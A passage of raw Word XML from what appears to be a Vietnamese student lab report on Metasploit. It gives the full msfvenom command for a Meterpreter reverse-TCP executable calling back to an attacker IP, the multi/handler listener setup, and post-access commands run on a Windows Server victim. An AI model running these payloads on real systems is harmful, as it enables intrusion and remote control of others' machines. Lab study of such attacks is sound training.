              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidRPr="00A91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>inux</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA3D238" w14:textId="726B7A50" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>(192.168.</w:t>
            </w:r>
            <w:r w:rsidR="003C2E66" w:rsidRPr="00A91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>1.10</w:t>
            </w:r>
            <w:r w:rsidRPr="00A91CE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47D18" w14:textId="77777777" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91C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FD7E3" w14:textId="77777777" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00FE49E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91CEB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Dùng cho Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6DABD902" w14:textId="27E74FCD" w:rsidR="00FE49E5" w:rsidRPr="00A91CEB" w:rsidRDefault="00BA6488" w:rsidP="0085159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91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sử dụng </w:t>
      </w:r>
      <w:r w:rsidR="00B1214B" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>etaspoilt trong Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FED3E57" w14:textId="34B5091A" w:rsidR="00851594" w:rsidRPr="00A91CEB" w:rsidRDefault="00851594" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: Khởi động MSFConsole bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B0A6E" w14:textId="1613A6BE" w:rsidR="00AE3DEF" w:rsidRPr="00A91CEB" w:rsidRDefault="00AE3DEF" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CE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D8A9C2" wp14:editId="3B838444">
            <wp:extent cx="5943600" cy="4883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921C" w14:textId="08D9D6CD" w:rsidR="00E20201" w:rsidRPr="00A91CEB" w:rsidRDefault="00E20201" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tạo Virus </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0477BD63" w14:textId="46781C13" w:rsidR="00E20201" w:rsidRPr="00A91CEB" w:rsidRDefault="0003016B" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta chạy lệnh này trên máy Kali để tạo virus tên </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dev.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C0C43F" w14:textId="34B752DC" w:rsidR="00FC2739" w:rsidRPr="00A91CEB" w:rsidRDefault="00FC2739" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -e x86/shikata_ga_nai -f exe &gt; /root/dev.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A505620" w14:textId="24C6553D" w:rsidR="00264E66" w:rsidRPr="00A91CEB" w:rsidRDefault="00264E66" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Trong đó, 192.168.1.10 là IP máy Attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ECA29C" w14:textId="6EE6E319" w:rsidR="00264E66" w:rsidRPr="00A91CEB" w:rsidRDefault="00264E66" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>4444 là port dùng để kết nối với máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA330D1" w14:textId="3B195435" w:rsidR="00EE4872" w:rsidRPr="00A91CEB" w:rsidRDefault="00FC2739" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55C04EB8" wp14:editId="10035486">
            <wp:extent cx="5943600" cy="1610360"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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278A" w14:textId="5AF72847" w:rsidR="00B93CD5" w:rsidRPr="00A91CEB" w:rsidRDefault="00B93CD5" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả sau khi chạy lệnh thì ta đã tạo được virus dev.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D12164" w14:textId="07FB399A" w:rsidR="007C2A0C" w:rsidRPr="00A91CEB" w:rsidRDefault="00161784" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BDD8EB4" wp14:editId="62039CE7">
            <wp:extent cx="5943600" cy="4852670"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="34" name="Picture 3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04A3" w14:textId="19728967" w:rsidR="00F9620A" w:rsidRPr="00A91CEB" w:rsidRDefault="00F9620A" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Bước 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DF7298" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Thực hiện phát tán và khai thác máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0DE2B9" w14:textId="655A0712" w:rsidR="005E338C" w:rsidRPr="00A91CEB" w:rsidRDefault="005E338C" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Ta chuyển file dev.exe cho máy nạn nhân</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73806175" w14:textId="28A1C9A4" w:rsidR="005E338C" w:rsidRPr="00A91CEB" w:rsidRDefault="00C920D9" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61C16740" wp14:editId="738E6B12">
            <wp:extent cx="5943600" cy="4469765"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="36" name="Picture 3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1967" w14:textId="08292C10" w:rsidR="00A422E3" w:rsidRPr="00A91CEB" w:rsidRDefault="00A422E3" w:rsidP="00851594">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Chạy lần lượt các lệnh sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA69F56" w14:textId="77777777" w:rsidR="00DF7298" w:rsidRPr="00A91CEB" w:rsidRDefault="00DF7298" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3B7B82" w14:textId="77777777" w:rsidR="00DF7298" w:rsidRPr="00A91CEB" w:rsidRDefault="00DF7298" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set payload windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE1F31" w14:textId="42488CE0" w:rsidR="00DF7298" w:rsidRPr="00A91CEB" w:rsidRDefault="00DF7298" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D45B76" w14:textId="77777777" w:rsidR="00DF7298" w:rsidRPr="00A91CEB" w:rsidRDefault="00DF7298" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86484F" w14:textId="46FBCF6D" w:rsidR="00DF7298" w:rsidRPr="00A91CEB" w:rsidRDefault="00DF7298" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455168A8" w14:textId="2894D886" w:rsidR="00C72FFD" w:rsidRPr="00A91CEB" w:rsidRDefault="00750991" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="714360E5" wp14:editId="3EE1D57F">
            <wp:extent cx="5943600" cy="2154555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59" name="Picture 5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8FC4" w14:textId="34331D26" w:rsidR="00C72FFD" w:rsidRPr="00A91CEB" w:rsidRDefault="00C72FFD" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sau khi thực thi file dev.exe trên máy Window Server 2012 (nạn nhân) thì ta đã truy cập vào được</w:t>
      </w:r>
      <w:r w:rsidR="001D3927" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>, kết quả như hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C291FA" w14:textId="79421A32" w:rsidR="005F12CA" w:rsidRPr="00A91CEB" w:rsidRDefault="00C72FFD" w:rsidP="00DF7298">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="67"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F12CA" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29798AA0" wp14:editId="71D58B0B">
            <wp:extent cx="5943600" cy="4904740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F8D5" w14:textId="4D8F0870" w:rsidR="00B604C0" w:rsidRPr="00A91CEB" w:rsidRDefault="00B604C0" w:rsidP="00B604C0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iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiếp theo, ta tiến hành xem các tiến trình đang chạy trên máy nạn nhân bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03438669" w14:textId="13A47488" w:rsidR="00903322" w:rsidRPr="00A91CEB" w:rsidRDefault="00903322" w:rsidP="00903322">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="411DA43B" wp14:editId="7498E8C9">
            <wp:extent cx="5943600" cy="49180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4AA4" w14:textId="5DAC7B80" w:rsidR="003854FF" w:rsidRPr="00A91CEB" w:rsidRDefault="003854FF" w:rsidP="003854FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="810"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Ta tiếp tục tạo thư mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Hacker-</w:t>
      </w:r>
      <w:r w:rsidR="00D42790">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LeHaiDang-20110243</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên</w:t>
      </w:r>
      <w:r w:rsidR="00D948AB" w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ổ C của</w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> máy nạn nhân bằng lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mkdir C:/Hacker-</w:t>
      </w:r>
      <w:r w:rsidR="00D42790" w:rsidRPr="00D42790">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D42790">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>LeHaiDang-20110243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F581A4F" w14:textId="1E8A45F5" w:rsidR="007354D1" w:rsidRPr="00A91CEB" w:rsidRDefault="00741A8C" w:rsidP="007354D1">
      <w:pPr>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91CEB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:iCs/>
          <w:noProof/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="633D3D23" wp14:editId="1DA1A9B3">
            <wp:extent cx="5943600" cy="3154680"/>
